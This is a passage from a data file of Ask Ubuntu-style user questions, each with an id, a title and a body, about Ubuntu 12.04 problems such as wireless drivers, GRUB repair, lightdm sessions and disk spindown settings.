md5sum:7d497b8dfcefe1c0b51a45f3b0466994 it is okay with the local copy . ubuntu software center is not happy with the local copy , it always tries to connect to the internet first and when i am not connected to internet , the install button is grayed out . why is this happening ?
137431	lightdm run desktop for one session `` this session only ''	i sometimes experiment with many different desktop environments , some of which can be unstable . i have had a few times where i needed to drop into root shell , disable auto login , then log into my regular desktop , and re-enable the auto-login again . if i run a desktop from lightdm and it crashes in general , or on logout , auto login logs me into the last used desktop environment . in trying out questions i want to load a different environment for only one session . does lightdm have an option for `` this session only '' on desktop environments , if not does another login manager have that functionality ? update : i tried looking into setting up a default login , as explained in this question , how do i change the default session for when using auto-logins ? to try and setup a persistent default login , but as stated here , http : //www.tuxgarage.com/2011/09/setting-lightdm-to-auto-login-oneiric.html , `` lightdm takes into account the last chosen session , and , thus , overrides any other settings for both 'user-session ' and 'autologin-session ' , set up in the '/etc/lightdm/lightdm.conf ' ; just make sure your system is updated ! '' so no go , as it will still login into the last chosen session . also from that link i tried setting up an `` autologin-user-timeout '' hoping that i could do a keypress if there is a delay in the autologin , but this option does not work for reasons stated on the link .
137436	how can i automount my ecryptfs ~/.private directory without logging in ?	on ubuntu server 12.04 lts , ecryptfs is set up where my /home/user/.private directory becomes decrypted when i login . i can then access my files in /home/user/private . but if i do n't login to the server , but i access the server in nautilus from ubuntu desktop using ssh , the private folder is still encrypted so i ca n't view the files . is there a way so when sshfs is used via nautilus and the ssh share is mounted , the server will decrypt the .private directory ? or , can it always be decrypted as long as the server is turned on ? i 'm only interested in the encryption if the server is off ( i.e , hdd stolen ) .
137437	wireless network not working on hp pavilion dv2000	i can not connect to a wireless network using ubuntu 12.04 on my laptop . i have an hp pavilion dv2000 p/n rn088ea # uuw . when i run the lspci command it shows i am using a broadcom bcm4311 . i ran the command rfkill list . i read that it would show me if there was a soft or a hard block stopping my computer from wireless working . it showed neither soft or hard blocked . i 've tried uninstalling and reinstalling the broadcom sta wireless driver . that driver bundle says that it contains every driver : this package contains broadcom 802.11 linux sta wireless driver for use with broadcom 's bcm4311- , bcm4312- , bcm4321- , bcm4322- , bcm43224- , bcm43225- , bcm43227- and bcm43228-based hardware . still i get no wireless connections . and i have made sure that the hardware key is turned on . i 've even tried reinstaling both with the hardware button turned on and off . any suggestions ?
137444	is there anyway to enable system wide inverse scrolling ?	is there any way to enable inverse scrolling like on mac osx ?
137448	how to config multiple monitor with optimus ?	i have an acer aspire 8951g running 12.04 pangolin with bumblebee working beautifully . my problem is that when i connect either the vga port or the hdmi to my projector there is no way i can see to properly set up the resolutions or colours . the default basic display driver sees the projector correctly , but messes up colours and resolutions ( on hdmi ) and resolutions on vga . ( its a 1280 x 720 projector ) am i missing some sort of xorg configuration ? nvidia-xconfig does not seem to exist and running optirun nvidia-settings -c :8 opens the settings , but of course only for the one display . i just want a way to set a default config for my projector via vga or preferably hdmi . any help would be wonderful .
137449	where can i find blender tutorials ?	where are some blender tutorials , ( preferably 2.63 ) i used blender back in the old days , when they used the old gui . and since then i havened used it . i want to learn it again , but the gui change makes it difficult , i like it but still . i would love some tutorials not only for the new gui . but a full blender tutorial is welcome as well .
137451	need to close the 12.04 gnu bash screen	i recently upgraded my toshiba satellite p105 laptop from ubuntu 11.04 to 12.04 ( i do n't have windows there ) . it was working fine for a couple of days , but now every time that i start the laptop , i get a black screen that says gnu bash ( it looks like the operating system command screen ) . i ca n't find the exit command to close that screen and to continue starting the regular ubuntu . i would appreciate some help , and please write what i have to do in plain english , i am a normal person ( a mechanical engineer ) not a computer scientist . thanks in advance for you help .
137453	can not access external monitor on fresh install of 12.04 or hp laptop with nvidia graphics	i just reinstalled ubuntu on one of my laptops , an hp pavillion with nvidia graphics . this was a fresh install replacing 10.10 with the new 12.04 . i use an external monitor plugged in via vga because the screen on the laptop is broken so badly that it can not be read . all went fine during installation , but upon reboot the fresh install does not recognize the external monitor . naturally i am able to log in by just hitting the enter key and inputting my password and hitting enter again . i tried this , hoping it would see the external monitor after login . it did not . i can tell it logged in properly because the broken laptop screen changed colors . i 'm sure i could edit a config file or something but this is difficult to do on a laptop without a working screen . as i write this , i am reinstalling with the `` download updates '' option selected in hopes that this may fix the issue . i would rather just be able to change monitors with a keyboard shortcut but i do n't think this is possible . i did not have any such problems with the old 10.10 installation . any help resolving this issue is appreciated .
137454	how does one open the hud from the command line .	alt is used to open the hud in 12.04 . i 'd like to use alt to execute a second action as well as open the hud by having alt execute an executable script . so alt = script , that does hud and other stuff . i know how to do all of this except call the hud from the command line .
137458	android device not recognized in eclipse	i tried to plug my samsung galaxy s to my ubuntu box for developing applications in android , but the problem is that lsusb does n't recognize the device . i tried with a friend smartphone and it is recognized , but mine is not . any idea ?
137460	wireless roaming aggressiveness	i was wondering if there was anyway to change the aggressiveness of wireless roaming between access points of the same ssid in ubuntu like there is in windows , i often times find that when i walk downstairs in my house that i have an awful wireless signal even though i 'm basically next to an access point , so i have a feeling that its not switching access points when i move . i am running ubuntu 12.04 right now .
137461	how to permanently remove update for gwibber facebook plugin	i do not use facebook and do not want to add the gwibber update for facebook that was recently added . i have facebook blocked in opendns but i want to keep from adding this plugin . how do i make the update go away so i do not have to add it ? i am using ubuntu 12.04 . if i can not remove it , will it send my info to facebook ?
137464	need to edit /etc/x11/xorg.conf from a live cd	i have just installed ubuntu 12.04 on an hp laptop with nvidia graphics hardware . this machine used to run ubuntu 10.10 and i have to use an external monitor as the internal screen on the laptop is broken and can not be read . using the livecd to install 12.04 and erase the previous 10.10 installation , all worked fine while installing from the live cd and the external monitor was detected and could be used . after finishing the install , and rebooting , the laptop will not recognize the external monitor and since the internal screen is unusable i can not configure displays as one normally would . i think i may be able to alter my /etc/x11/xorg.conf file to use the external monitor instead of the default device , but i am unsure of what to change in the file . my /etc/x11/xorg.conf file looks like this : section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection
137465	how to switch between graphics on dell inspiron n5110 ?	i have got a dell inspiron n5110 running ubuntu 12.04 . it has two graphic cards , integrated intel graphics and nvidia . i was wondering if there is a way to switch between graphic cards . as the nvidia card is using a lot off battery power i want the intel card to be the default .
137471	how to make package manager recognize libs that were compiled manually ?	i had to compile opencv 2.4 on my machine . how to make applications installed from synaptic do not ask to install opencv 2.3 libs dependencies ( since 2.4 is already installed in the system ) ?
137477	which version of ubuntu should i install on a macbook pro ( intel ) ?	i already installed ubuntu 12.04 in my macbook pro , and everything worked alright except for the wifi ( it said something about the firmware ) and because i 'm new in this i could n't fix it , so my question is : what version of ubuntu works fine ( with the wifi working ) `` out of the box '' in macbooks ? i already tried to install ubuntu 11.10 but i could n't .
137479	setsid by default in terminal	so i 've just discovered the command setsid , which makes life a whole lot easier for running programs from terminal . what i 'd like to know is if there 's a way to set programs to launch in a new session automatically , because honestly i 'm probably going to be prepending setsid before everything i run now . is this bad practice for some reason ?
137483	how to create a `` shutdown user '' or `` shutdown account ''	red hat had a feature useful to me at the present time . there was an account , generally called `` shutdown '' , and when you logged in with the account , the system shut down . in my specific case , i have ubuntu server running in a vm on my local system . the vm is running a web app , and when i 'm done doing work , i want to shut down the vm . unfortunately , i ca n't install vmware tools to get the `` power button '' based shutdown . currently i login then sudo shutdown -h now , then type my password again , and things shutdown . really , it 's getting annoying all that waiting around and typing things . how do i replicate the `` shutdown account '' functionality in ubuntu ? a related question , were there any security gotchas that motivated people to stop using this kind of account ?
137485	rails 3 not using rvm ?	i there any way to install this * not using rvm ? i 've got rails 3.2.3 gem installed but terminal ca n't found binary . if you tell me to use rvm - please show me some working ( step by step ) tutorial ! sorry , for my anger but i spend week trying to set it fast and easy as it was on rails 2 , but i found lots of not working tutorials with rvm .
137491	what is the best alternative to picasa ?	i 'm struggling with what to use instead of picasa and need some help . i just need it to be organized , quick , shows all video files and is easy to delete entirely from hdd and has a good image viewer .
137492	ubuntu will not install	i downloaded the desktop iso for ubuntu 12.04 and burned the iso to a dvd . when it boots , it loads up to the splash screen and stops until i get impatient and hit enter then it brings uup the language selection screen after which it loads the gui with the options where i choose install . at this point the screen goes blank with a flashing cursor on the upper left corner of the screen and that is all it does . how do i get it to install . system config motherboard : asus a8n-sli deluxe cpu : amd 3500 athalon 64 ram : 1 gb hd : 300 gb operating system : windows 8
137501	maximize window button is missing on all programs	the maximize button is gone on all programs , although it does appear on chrome and firefox . i would like all programs to have all 3 options ( close , minimize , maximize ) . how can i fix this issue ? it was working at one point , but now i only get minimize and close .
137504	wireless greyed out with an intel 3945abg	i just installed ubuntu 12.04 on my hp laptop and can not enable my wireless card . i have checked the bios and it is enabled there . i have checked the drivers and i think i have the correct one . the option to enable wireless is grayed out . i am a new ubuntu user so any help would be appreciated . my laptop has an intel/pro 3945 wireless card installed . here is a printout of lspci -vv : 10:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) subsystem : hewlett-packard company device 135b control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 46 region 0 : memory at e4100000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : iwl3945 kernel modules : iwl3945 please let me know if any other information would help .
137505	partial screen freeze	when i scroll up or down . in either a document or in firefox or chrom , i encounter a **partial **screen freeze . on the left side a wedge shaped portion of the screen freezes . the wedge is a 45 degree angle from the lower left corner to the center of the screen and that connects to a line from the left center of the screen forming the wedge of frozen screen . any ideas as to what causes this ?
137507	how to reset unity after being replaced by cairo-dock ?	i have recently installed ubuntu 12.04 . i had installed cairo-dock as well . my brother closed something in cairo-dock , he does n't know what exactly he did as he is new to ubuntu . after he did that , the unity panel is completely missing . even the launcher is missing . the cairo-dock panel is also missing . how can i fix this ?
137508	ca n't install libssl-dev , dependency problem	i 'm trying to install the package libssl-dev , but i get the following error : libssl-dev : depends : libssl1.0.0 ( = 1.0.1-4ubuntu3 ) but 1.0.1-4ubuntu5 is to be installed the package libssl1.0.0 is installed fine .
137514	ubuntu installed on usb flashdrive not booting on hp pavilion dv7 6b00et ( not llive )	i installed ubuntu 12.4 on 8gb usb flash drive . it went ok . but when i reboot it goes to blank screen . if i press shift the ( grub loading ) msg on screen . fan starts so i assume ati hd6770m graphics card gets control . i 've to press and hold power key to close . bios is set to dynamic but changing to fixed does n't help . flash drive boots ok on my 32bit desktop . how can i turn ati card off using live-usb ? ati card has no problem with win7 , hp will not help . i 've been trying to reinstall ati drivers , changing boot options in grub but nothing helped . driver hp dv7-6b00et at this point , i 've tried this : i selected to stop ati card . used a live-usb , mounted ubuntu . installed flashdrive , chrooted , and became root . edited /etc/rc.local to add : modprobe radeon echo off > /sys/kernel/debug/vgaswitcheroo/switch the /etc/modprobe.d/blacklist-local.conf file was empty so /etc/rc.local : add blacklist fglrx reboot === > blank screen i make /etc/rc.local executable
137518	video games on linux	what are the main reasons that video games are n't developed for linux . i get that there are multiple distributions , that use different kernel versions . but there has to be ways . i never understood why it 's never a main target for big titles .
137527	web upgrade 12.04 failed , can not reboot	upgraded to 12.04 via net . upgrade stopped at debnianconfig . can not reboot as some files are missing . have i lost all my photos ?
137528	ubuntu wo n't save my settings for thinkpad trackpoint	i 'm using ubuntu 12.04 on a thinkpad x200 . to configure the trackpoint , i use `` configure trackpoint '' . unfortunately i ca n't make ubuntu saving my settings ( concerning the sensitivity etc. ) . whenever i reboot the computer , it 's set to generic settings again . i already tried htorque 's answer to a similar question and created a new udev-rule for the trackpoint-settings but it did n't helped . so , how can i make theses settings permanent ?
137530	once authenticated once , passwords are cached in lightdm	we are preparing 12.04 lts for our userbase and have done some basic configuration to the login screen ( disabled guest account , removed user list , etc ) . however , one thing that i 've noticed is that once a user has authenticated at the login screen ( krb5 ) , a user will no longer have to enter their password . in fact , even after reboot , if a user has previously authenticated , all they have to do is type their username and they can login with no other prompts . obviously this is a major security risk at the enterprise level . please let me know if you need any other information . any advice would be greatly appreciated ! thanks for your consideration , but we 've realized it is a gid conflict . we have an ldap group with gid 112 , which happens to be the gid of the nopasswdlogin group at least in precise . we 'll be migrating that ldap group to another gid . this is just an fyi if others see this behavior by chance . i ca n't close this for another few hours .
137532	gimp clone tool ctrl+click does n't work when ubuntu show mouse position is selected	in gimp 2.8 , i ca n't select clone source with ctrl+click when `` show mouse position with ctrl selected on in ubuntu system configuration '' . i post here because i spent a lot of time trying to understand and no info was found over internet .
137542	how does ubuntu create `` user-defined '' file associations ?	i 'm afraid my question 's gon na look like a rant , but i 'm really curious how such terrible setting have got created . according to this answer , any customizations that you make are stored in your home directory , in ~/.local/share/applications/mimeapps.list . however i 've found there the following ( list shortened and sorted for clarity ) : application/x-shellscript=userapp-emacsclient-eth68v.desktop ; emacs23.desktop ; gedit.desktop ; openoffice.org-writer.desktop ; userapp-thunderbird-5ixu8v.desktop ; ... ; userapp-emacsclient-4dbr8v.desktop ; writer.desktop ; userapp-thunderbird-5ixu8v.desktop ; text/x-sql=emacs23.desktop ; userapp-emacsclient-eth68v.desktop ; gedit.desktop ; openoffice.org-writer.desktop ; userapp-thunderbird- video/mp4=totem.desktop ; vlc.desktop ; video/mpeg=vlc.desktop ; video/x-flv=vlc.desktop ; video/x-matroska=totem.desktop ; vlc.desktop ; video/x-ms-wmv=totem.desktop ; vlc.desktop ; video/x-msvideo=vlc.desktop ; why is emacsclient twice there ? these entries are supposed to be user-defined , but i 'm sure i did n't create them . nor did i ever reinstalled emacs ( which could possibly explain this duplicity ) . does anybody think openoffice.org-writer should get used for editing shell scripts ? or even thunderbird ? moreover , it 's twice there . it was n't me , i 'm sure . why does video get associations depending on it 's format ? ca n't i specify something like video/*=vlc.desktop ( possibly with exceptions for strange formats my favorite player is incapable to play ) ?
137544	how to change harddrive spindown time ?	if i run my notebook on battery mode , ubuntu spindown my hardrive every few seconds . how can i fix that ? i have tried it with sudo hdparm -s 127 /dev/sda* but i am not able to disable the spindown and canâ´t find the reason for this `` bug '' . running ubuntu 12.04 - bug is since 12.04 recent updates are installed , the problem is still recent . i can change the settings via . sudo hdparm -b 127 but if i change hdparm.conf , ubuntu does not recognize it . /dev/sda { apm_battery=127 }
137546	guitar pro 6 in does not print	i can not make guitar pro 6 print , it can print to pdf ( with errors in the margin ) but the program can not print . i dont have that problem with other ubuntu 12.04 programmes . http : //getsatisfaction.guitar-pro.com/arobas_music/topics/cannot_print_in_ubuntu_12_04
137550	where are the ubuntu and ubuntu one servers located ?	i would like to know where the ubuntu main repository and ubuntu one servers are located .
137552	gedit open everything in tabs	how can i make gedit to open every file in tabs . i edit a lot of files ( .html/.php/.sh/./.desktop etc ... etc ... etc ... ) . at the same time when i try to edit another file gedit opens it in another window . thats really annoying when that file is related to the other files . and need to peek between them . how can i make gedit to open every file in tabs
137553	determining what files a package updates / copying software between machines	how do i determine which files comprise an application ( built from source , not from a repo ) , so i can copy it ? i built an application from source , but because the libraries it needed to build were not compatible with the system that will run it , i had to build it in a vm . ( i am sure there is some way of maintaining two different sets of libs , but i do n't know how ) . it does n't need those updated libraries to run , so i need to find out what i need to copy . i thought of capturing the output of sudo make install , but that does n't seem to work . i could do a diff of files on the whole system but there must be an easier way ? maybe if i pack it into a .deb or something ?
137563	hp : set media buttons on the fx buttons as secundary action	i 've an hp laptop with media keys . the primairy action f2 button is to dim screen , f7 is pauze current song , f8 next song etc , f11 mute . when i want to use the real function of an fx button i have to press the fn button ( between ctrl and super button ) at the same time . so to go fullscreen i 've to press fn + f11 at the same time . how can i revert this ? so fo that f11 i go fullscreen and fn + f11 mutes my sound ?
137564	ubuntu 12.04 upgrade : grub update-grub fails after update	thanks in advance for any help . i 'm running ubuntu and windows 7 on separate partitions with a large storage drive to share files between them . fdisk -l shows : device boot start end blocks id system /dev/sda1 * 2048 209717247 104857600 7 hpfs/ntfs/exfat /dev/sda2 209717248 419432447 104857600 83 linux /dev/sda3 419432448 3907028991 1743798272 b w95 fat32 there 's a second gpt backup disk , but it should n't be a problem . device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt i 've just upgraded my 11.10 ubuntu to 12.04 , during the upgrade i got an error about grub being installed on a partition , which i recognised from installing 11.10 and ignored . however , having completed the upgrade all the ubuntu entries have disappeared from grub . there are a few linux 3 entries , which do n't work and my windows 7 entry , which i did n't try but i presume still works . i 've booted up the 11.10 live cd and i 've tried following this : http : //opensource-sidh.blogspot.com/2011/06/recover-grub-live-ubuntu-cd.html however when i get to the part where i run update-grub i get /etc/grub.d/00_header : 28 : . : ca n't open /usr/share/grub/grub-mkconfig_lib i had similar problems when i installed 11.10 but i ca n't remember how i fixed them > _ < any advice on what to try next ?
137565	12.04 freezing on macbook pro	i 've an older macbook pro ( mid 2009 ) dual booting osx and ubuntu . i really like coding and testing on ubuntu , however , often the screen freezes where nothing will work while i 'm performing simple tasks like playing music or web browsing ( i have n't seen any correlation to a specific program ) . the mouse will move , but it ca n't interact with the windows and the keyboard does n't do anything . i am using gnome shell currently , but i 've been having this problem for long before i installed that . is there something i 'm doing wrong to cause this ?
137573	how to quit startup application automatically on shutdown ?	i have transmission as a start-up application . i use the command transmission -m to start it up . how can i quit transmission automatically when i 'm shutting down ? the problems i 'm facing is how to bring the running program to the foreground and send a quit command to it with a shell script ? or send a quit command without bringing it to the foreground ?
137574	tried to open cairo-dock in ubuntu 12.04 and now ca n't log on to the account i tried to open it on	a while back i installed cairo-dock on my pc when i had ubuntu 11.10 . but after recently upgrading to ubuntu 12.04 , i opened cairo-dock and my computer immediately froze . so i restarted , and the log-in screen worked fine , but when i logged on to the user i opened cairo-dock on , i just saw the background for the account , nothing else . my point is i really do n't want to have to make a new account for myself , plus the account that froze was the only administrator . i 'd really like to fix this soon , any ideas as to how ?
137575	connecting to wifi network from terminal/ubuntu server with cheap dongle	i bought cheap wifi dongle of ebay . i want to hook my server to wifi network sometimes ... so , i do lsusb and i see this : bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan i configured /etc/network/interfaces # wifi network auto wlan0 iface wlan0 inet dhcp wpa-driver wext wpa-ssid xxxxxxx wpa-ap-scan 2 wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk xxxxxx and i did : sudo ifconfig wlan0 up but it seems not to work ... as i do n't see new ip on router arp . ifconfig gives : wlan0 link encap : ethernet hwaddr xx up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
137577	put hdds in standby after x minutes using hdparm does n't work	i use ubuntu 12.04 on a home server . there are 5 hard drives : one ssd with the os and 4 hdds ( samsung hd204ui ) configured as a raid5 using mdadm . i do n't need the raid very often ( say , about once per day in average ) ; it contains multimedia data and some backups , so i decided to put the drives to standby most of the time . i configured the drives to automatically spin-down after 20 minutes using hdparm , here /dev/sda as an example : hdparm -s 240 /dev/sda the output of the command confirmed this : /dev/sdb : setting standby to 240 ( 20 minutes ) but the problem is that the drive spins down after about 5 seconds ( instead 20 minutes ) after the last access , and hdparm -c /dev/sdb displays : /dev/sdb : drive state is : standby why does n't the drive wait the 20 minutes as configured ? does it have something to do with the raid setup ? ( i do n't think so ... ) this very short timeout is problematic since it is a raid5 and when i access a file , it is spread block-wise around the four drives . since drive 1 is n't needed when drive 2 is read , it went asleep when it will be used the next time ( after drive 3 has been read from ) . so the drives keep spinning up and down the whole time resulting in a throughput near zero . for the people being concerned about the life of my drives : it will be no problem that the drives are spinned up and down once a day in average since i prefer saving energy and heat over health of the drives ( i use raid5 and the content is n't very important ) .
137580	why does gwibber-service-facebook/twitter updates when i have uninstalled gwibber ?	i uninstalled gwibber , the social networking tool as soon as i made a fresh install of ubuntu 12.04 . however in recent updates ( via apt-get update/upgrade commands ) , gwibber-service-twitter and gwibber-service-facebook have been updated . why did this happen ? why did n't the gwibber related packages not removed when gwibber was uninstalled ? are these components still being used by other software ? is there not a way to remove no-longer-related software components ?
137581	fail to upgrade from 11.04 to 12.04	i tried to upgrade from 11.04 to 12.04 by update manager , but failed . the error message was : failed to fetch http : //kr.archive.ubuntu.com/ubuntu/pool/main/t/ttf-alee/ttf-alee_12+nmu1ubuntu1_all.deb' how can i fix it ?
137588	brasero says it wo n't burn the cd because the file is too big , what 's going on ?	i have an old computer that ca n't handle a boot stick install , so i have to create an actual , old fashioned boot cd . however , the image size for ubuntu 12.04 is 732mb , which is too large for a cd , which can hold only 700mb . the maintainers of ubuntu 12.04 say the image size will never go over 700mb , and indeed , the download size seemed to be 689mb . brasero says it wo n't burn the cd because the file is too big , what 's going on ?
137591	booting from cd , how update grub2 to reflect changed uuid ?	i changed disks around now i get a message from grub ( grub2 ) saying disk w/ uuid=xxxx does not exist . i 've booted from a usb flash drive now , but ca n't figure out how to run the grub update so that it targets the right grub installation . i gather it would just update the one associated with the current booted system . what am i missing ? to add to my confusion , the install i wish to recover is on an encrypted lvm volume , though the boot partition is not in lvm nor encrypted , but it makes it harder to just go around and reinstall . i do have a backup of the luks header if need be , hope to just get back to old install though . thank you !
137594	12.04 64bit detects 7.7 gb of ram out of 8 gb	i 've dell inspiron n5110 with 8 gb of ram , i installed ubuntu 12.04 64-bit . the problem is that all things are working fine but ubuntu detects only 7.7 gb of ram , i 've checked & noticed that i 've 4 gb of kingston & 4 gb of samsung ram . now i 've installed windows to check if it is ram fault or what , windows 7 is showing 8 gb of ram . dedicated graphics yes video card nvidia geforce gt 525m ( directx11 , sm 5.0 , purevideohd ) video card memory 1 024 mb http : //ark.intel.com/products/53469 intel® core™ i7-2670qm processor ( 6m cache , up to 3.10 ghz ) processor graphics intel® hd graphics 3000 updated there is no option in bios to set graphic card ram or to set which graphic card to use ... i have checked 7 to 8 time ...
137598	how do i customize the ntp poll rate ?	i 'm setting up ubuntu on an embedded machine that runs over a cellular connection , where we pay per byte . the machine also has no rtc battery , so it starts from a random time every boot . i 'd like to ensure that the time gets synced up when the cellular connection comes available so that log messages , etc have real times , but i also do n't want to pay an arm and a leg for ntp traffic . can i customize the rate at which ntp updates the time ? i 'm using openntpd currently , but i 'm not wedded to it . the internet is not necessarily up at boot , so ntupdate and related at startup wo n't work . and scheduling via cron means waiting for the scheduled task to kick in , whereas i want a time daemon to get a time sync asap .
137601	evernote printer for linux	i am looking for evrenote printer . same idea as pdf printer . whenever you print anything it sends it to ever note .
137611	why ca n't i install an extension ?	i 'm trying to install an extension via the gnome tweak tool . however when i navigate to the extension directory and click `` open , '' nothing happens . the button is being pressed ( the press event is stimulated ) but the dialog does n't disappear or change at all .
137612	why is ubuntu unable to connect to my wireless router ?	i have just installed the latest version of ubuntu and i want to connect to the internet using my wireless router . i tried using ndiswrapper but i received errors . i also tried using suggestions in this wifihowto . when i try installing from the additional drivers , i receive the error messages below . sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log 2012-05-15 19:14:29,861 debug : instantiated handler subclass __builtin__.broadcomwlhandler from name broadcomwlhandler 2012-05-15 19:14:29,862 debug : broadcom sta wireless driver availability undetermined , adding to pool 2012-05-15 19:14:29,862 debug : loading custom handler /usr/share/jockey/handlers/madwifi.py 2012-05-15 19:14:29,873 warning : modinfo for module ath_pci failed : error : modinfo : could not find module ath_pci
137623	google chrome can not be installed	i downloaded latest version of google chrome and then tried to install it . however it gave me errors . i searched through the net and noticed that most of the people 's problem solved when they installed missing dependecies . therefore i tried to install them too but seems like it does not work . zero @ ubuntu : ~/downloads $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : google-chrome-stable : i386 0 upgraded , 0 newly installed , 1 to remove and 23 not upgraded . 1 not fully installed or removed . after this operation , 116 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 169296 files and directories currently installed . ) removing google-chrome-stable : i386 ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... zero @ ubuntu : ~/downloads $ sudo dpkg -i google-chrome-stable_current_i386.deb selecting previously unselected package google-chrome-stable : i386 . ( reading database ... 169201 files and directories currently installed . ) unpacking google-chrome-stable : i386 ( from google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : i386 : google-chrome-stable : i386 depends on xdg-utils ( > = 1.0.2 ) . dpkg : error processing google-chrome-stable : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable : i386 could you please help me ? thanks .
137624	how do i install utorrent by hand ?	so i 'm new to ubuntu , in fact i 've only installed it yesterday . there are a few programs i want to install.. both of which are a .tar.gz and a .tar.bz2 file . when i double click on them , they just open in the archive manager ... how do i install them ? edit : the programs i want to install are katawa shoujo and utorrent . http : //www.katawa-shoujo.com/download.php http : //www.utorrent.com/downloads/complete ? os=linux
137632	how do i terminate all idle incoming ssh connections ?	i want to be able to automatically terminate ssh connections that are idle for more than 10 minutes . how do i do this ?
137647	is ubuntu 12.04 compatible with the intel 845g motherboard chipset ?	will ubuntu work on an intel 82845g motherboard or are there any known incompabilities ? would i need any special vga drivers and were would i get them ?
137648	ubuntu 12.04 installing programs problem	i 'm having trouble in installing programs from the web such as adobe flash player and so on . when i download them all that happens is a get a file . is there a way to get something to like install the programs like windows has .exe ?
137654	menus not visible in some apps in xubuntu 12.04	i 've been using ubuntu 12.04 for a few weeks and recently added the xubuntu desktop as well . i have noticed that in some applications , there is no menu present . for example , in thunar , their is no menu ( file , view , etc . ) , so i ca n't figure out how to `` show hidden files . '' could this be some conflict between xubuntu and unity 's global menu . i want to be able to log in under either on my netbook , so uninstalling one or the other is not an option . any ideas ?
137655	boot drops to a ( initramfs ) prompts/busybox	i am running an hp pavilion dv6000 dual boot win7 and ubuntu 12.04 . ( well , up until today ) . after a reboot , the boot process drops to the busybox shell and i end up at the prompt : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i 've been researching others who have had this same problem , but have n't been able to find any of those solutions to work for me . i tried the method described here , and after the final command mount -t ntfs-3g /dev/sda1 /root -o force it does nothing and gives me another ( initramfs ) prompt . i can boot to a live cd ( usb ) and get to a terminal , but it does n't seem to do much good , as i can see the /dev/sda1 in the ls command , but it does n't recognize it when i try to cd to it . one more question : using the command fdisk -l how can i tell which mount point ( sda1/sda2 ) is my windows partition and which one is ubuntu ?
137657	spontaneous shut down and boot up problems on hp laptop	i have a hp 9700 laptop computer with ubuntu 11.10 on it . i have had periodic problems with random shut downs due to battery low ( when not actually low ) . however , it has progressed to the point now where i can not reboot . usually i ca n't get by the flash screen/bios screen . sometimes , rarely i get logged in , but it shuts down before i an perform any actions . it acts like a worm or virus . i thought it was the laptop battery problem i have seen , and i downloaded some code that seemed to fix it for a time . then it suddenly returned . now i ca n't even log in to my computer . it is a worse problem than any windows virus or worm i have ever encountered . i have tried to put an ubuntu disk in the cd/rom to try and run off this but i ca n't even get that to work . i am frozen out of my computer . is there anything i can do to recover ? sometimes i get a battery warning and sometimes it is a spontaneous shut down . with regard to the flash screen bios question . it will sometimes shut down before even showing the splash screen . sometimes i can get the bios options , sometimes it goes past . it can spontaneuosly shut down without warning at any time in the process . i do n't know it is battery related . i am back on my ubuntu box now after two or three days of trying to boot . i unplugged the battery and let it run down . when i logged back in the battery icon shows full and said it would shut down unless plugged in . i plugged in and i am running ok . very confusing and very frustrating .
137659	is ubuntu battery management better than windows ?	is ubuntu battery management better than windows ? i have noticed that in windows 7 a fully charged battery shows 3:30 minutes but in ubuntu it shows 2:00 hours ... ! ! ! so what is the power management in ubuntu ? good / better / fine / bad ?
137662	how do i disable the command line history in the dash ?	using unity , how to clear and disable the run ( alt+f2 ) history ? not the dash history , not the search history -- - the alt+f2 `` run '' history . the privacy settings applet of system settings does n't seem to cover this box . i found it in gconf-editor /apps/gnome-settings/gnome-panel/history-gnome-run however it 's ridiculous going into the editor to delete it each time . the file is ~/.gconf/apps/gnome-settings/gnome-panel/ % gconf.xml it 's dead now ( the file , linked to /dev/null ) ... and the stupid history is still there even after i restart . i give up again ... it must be hiding somewhere else , second copy . root @ qeynos : ~ $ find . | xargs grep -s nat097 binary file ./.config/dconf/user matches removed that too , nothing broke ( so far ) . odd that it 's in a binary file . will update after reboot . ok the system has re-created ~/.config/dconf/user on boot up and removed my redirection . i am beginning to think this history is n't easily possible to clear . btw recreating this file also reset my unity launcher and wallpaper to default state .
137663	how do i get the broadcom sta wireless driver to load in ubuntu 12.04 ? this is on an inspiron 1721	when i try to activate it a jockey.log is created . this is the internal wireless that worked in ubuntu 11.10 . does n't now that i upgraded to ubuntu 12.04 . i 'm using a usb wi-fi for now .
137667	empathy no longer connects to facebook	i just installed ubuntu 12.04 and it made me switch from windows ( irrelevant ) . i connected empathy to my facebook account and it worked really well for a couple of days , and all of the sudden it tells me `` authentication failed for account facebook ( xxxxxxxxx ) '' . is there a solution to fixing this problem ?
